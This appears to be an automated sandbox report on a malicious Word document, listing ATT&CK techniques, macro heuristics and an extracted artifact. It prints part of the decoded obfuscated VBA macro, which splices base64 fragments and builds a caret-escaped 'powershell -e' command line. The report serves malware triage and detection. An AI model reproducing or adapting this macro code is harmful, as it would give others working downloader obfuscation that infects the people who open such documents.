Verdict: MALICIOUS
Risk Score: 244

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The 'AutoOpen' macro is present and triggers a 'Shell()' call, indicating execution of arbitrary code. The VBA script appears to be heavily obfuscated, but the presence of a 'Shell()' call and the ClamAV detection for 'Doc.Macro.Obfuscation' strongly suggest it's designed to download and execute a secondary payload. No specific family could be identified due to the obfuscation.
Heuristics (8):
- ClamAV: Doc.Macro.Obfuscation-6355576-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Macro.Obfuscation-6355576-0
- VBA macros detected [medium; 3 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA [critical] OLE_VBA_SHELL: Shell() call in VBA
- AutoOpen macro [high] OLE_VBA_AUTOOPEN: AutoOpen macro
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8867 bytes |

SHA-256: 74764e7175cb0512fc66a0d1bef5990cb84b02c5a70efbdaeb51f54488dff2b9

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 23 long base64-like blobs)

Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub JBduqlbqm()
vRcUnYNPL = "8ORX9J6Z2ALL83TODYWRDX9DPCKAANQB0ADEAMQAwAGUAMwAyAFcAMwA2ADsAMQAxADcAZQAxADEANABxADEAMAA4AFcAMQAxADUAcQA0ADEAJgAxADIAMwAmADEAMQA2AHIAMQAxADQAcQAxADIAMQAmAD68H3O"
jDRiMBBzAoQ = Mid(vRcUnYNPL, 28, 128)
zrLNrOKi = jDRiMBBzAoQ
hptPkh = "ICTOYIEAMgAzACYAMwA2AHsAMQAxADkAZQAxADAAMQByADkAOABXADkAOQBlADEAMAA4AFcAMQAwADUAVwAxADAAMQAmADEAMQAwAH0AMQAxADYAfQA0ADYAewA2ADgDIZRM8W5"
TXTkJZhzEdr = Mid(hptPkh, 7, 121)
PUfrFs = TXTkJZhzEdr
HwPkTW = "7BYB1GR5344ON8SQDQ3FWPGTGOEFDEAMAAzAFcAMQAwADEAewA1ADkAZQAxADIANQB9ADEAMgA1ACcALgBTAFAATABJAFQAKAAgACcAcQB9AHQAJgByAGUAOwB7Y6H11QF"
nKVWVrzq = Mid(HwPkTW, 29, 95)
tMPpIkmKDSI = nKVWVrzq
XMFhB = "4353XF9GQHOGP8AAxAGUAMQAwADcAcQAxADAAMQBjADEAMQC1BI83XT3NB"
AJOrXf = Mid(XMFhB, 15, 33)
anziALQt = AJOrXf
GXQUZ = "ND93TQII1ADQAewA0ADEAZQA1ADkAJgAzADYAcQAxADEAMgAmADkANwB0ADEAMQA2ACYAMQAwADQAcQAzADIAcQA2ADEAcQAzADIAfQAzADYAdAAxADAAMQByADEAMQAwAHsAMQAxADgAfQA1ADgAfQAxADEANgB9ADEAMAAxAH0AMQAwADkAYwAxADEAMgB0ADMAMgAmADQAMwB9ADMAMgBjADMAOQBxADkAMgA7ADMAOQBlADMAMgB0ADQAMwB7ADMAMgBlAD5TAPBI91OC"
UtzfPwHI = Mid(GXQUZ, 9, 259)
jifHhYwtzE = UtzfPwHI
zsSSJcLsB = "KEXHZAxADAAMQBlADEAMQA0ADsANAA5AHIANAA3AHEAMQAxADUAYwAxADAANAB7ADcAMAByADEAMQA4AGUAMQAyADAAfQA2ADUAcgA4ADYAJgA2ADcAZQAxADIAMABXADQANwB9ADQANABXADEAMAA0AGUAMQAxADYAZQAxADEANgB7ADEAMQAyAH0ANQA4AHQAM1QQG"
Dfjrj = Mid(zsSSJcLsB, 6, 188)
iRQVCX = Dfjrj
aIPcOVtt = "94AMwBlADEAMQA2AGUAMQAxADQAOwAxADAANQBXADEAMQAwAHIAMQAwADMAOwA0ADAAdAA0ADEAcgA0ADQAcQAzADIAdAAzADYAfQAxADEAMgBXADkANwBxADEAMQA2AH0AMQAwADQAdAA0ADEAcgA1ADkAOwA4ADMAewAxADEANgBXADkANwByADEAMQA0AH0AMQAxADYAcQA0ADUAcQA4ADAAVwAxADEANAB0ADEAMQAxHD33C6BWIH7PMNVP63K00T3QVI48"
dHwGHA = Mid(aIPcOVtt, 3, 237)
DboiVcjJi = dHwGHA
ZmOisITRM = "NXQAxADIAMAByADEAMAA1AHIAMQAxADUAOwAxADAAOAB0ADEAMQA3AHEAMQAwADkAYwAxADEAMgB7ADEAMQAyAGUANAA2AHQAMQAwADAAfQAxADAAMQBlADQANwB7ADYAOQB0ADcAMgB9ADEAMQA5AHIANAA3AHQAMwA5AHIANAA2AH0AOAAzAGUAMQAxADIAYwAxADAAOAA7ADEAMAA1AGUAMQAxAKL4U158TELRS7"
wHzcGzEO = Mid(ZmOisITRM, 3, 220)
trocoGzdR = wHzcGzEO
BLtLvHBX = "I2K1GQT9GCEANQBxADMAMgBxADYAMQBjADMAMgASL"
MtqlJaYufC = Mid(BLtLvHBX, 11, 29)
MvQYDU = MtqlJaYufC
aYTztb = "25CGY2N7Y7W9DQAAIF7ADMAOQB7ADEAMAA0AFcAMQAxADYAcgAxADEANgB7ADEAMQAyAHEANQA4AHIANAA3AHIANAA3AGUAMQAxADIAcQAxADEANwAmADEAMQA0ADsAMQAwADcAdAAxADAAOAA7ADQANgB0ADEAMAAwACYAMQAwADEAVwA0ADcAZQA3ADAAJgAxADEAMABlADEAMAAwAH0AMQAxADgAOwA3ADMAZQAxADAAMQAmADcAMgB9ADQANwBxADQANAAmADEAMAA0AFcAMQAxADYAJgAxADEANgB0ADEAMQAyAHsARK7XV0Z464U1"
BZizLIzsI = Mid(aYTztb, 19, 293)
FzjwzVrTi = BZizLIzsI
kifzzkKc = "QATGR43OA0N1YADAAfQAxADAAMAByADEAMQAxAHIAMQAwADkAcQA1ADkAZQAzADYAYwAxADEANwAmADEAMQA0AHQAMQAwADgAVwAxAD0GIN1P"
biOLu = Mid(kifzzkKc, 14, 90)
cMPTf = biOLu
aqqKOc = "WRY9FrACQAZQBOAFYAOgBQAFUAQgBMAGkAYwBbADUAXQArACcAWAAnACkAAB7X1UYQUPUGGSXGW4QIBYNM05F80"
cGvQtp = Mid(aqqKOc, 6, 53)
piKMKY = cGvQtp
umPWIJczQ = "WRANABXADEAMAAxAFcAMQAwADgAcgAxADAAOAAmADUAOQB0ADMANgBjADEAMQA5AHsAMQAwADEAfQA5ADgAdAA5ADkAVwAxADAAOAAmADEAMAA1ADsAMQAwADEAcgAxADEAMAByADEAMQ9UKCXWXKM8MIUC93C"
VEuWOQB = Mid(umPWIJczQ, 3, 139)
wnEIJDV = VEuWOQB
oTNDMNC = "5C1WMG0NOXT9LNQA4AFcANAA3AGUANAA3AH0ANQAxAGUAOQA5AHEAMQAwADMAcQAxADAAMgAmADEAMgAwAHIANAA2ADsAOQA5AHsAMQAxADEAVwAxADAAOQBXADQANwB9ADEAMgAwAHIAOQA3AHQAOAAxACYANAA3AHQANAA0AGMAMQAwADQAJgAxADEANgB0ADEAMQA2AHEAMQAxADIAcgA1ADgAOwA0ADcAOwA0ADcAVwAxADEANAA7ADEAM31VZINSHZ2YIVHKZ15P"
MZFNaa = Mid(oTNDMNC, 14, 241)
fcrLCdArHR = MZFNaa
rvIlAwsnb = "Sset %JBduqlbqm%=p^owe^rs&&set %wrUAVlnmU%=he^ll&&!%JBduqlbqm%!!%wrUAVlnmU%! -e IAAoACcAMwA2ADsAMQAxADkAdAAxADEANQB7ADkAOQByADEAMQA0ACYAMQAwADUAZQAxADEAMgBlADEAMQA2AHEAMwAyAHIANgAxAHIAMwAyAHEAMQAxADAAOwAxADAAMQAmADEAMQA5ACYANA881OT1XRZXJDUNE278Z"
mtMlB = Mid(rvIlAwsnb, 2, 225)
OGbGtQTzmh = mtMlB
NNtcXDo = "QJFYR945YJZ05N2FICAGMAVwAnACkAfABGAG8AU ... (truncated)
```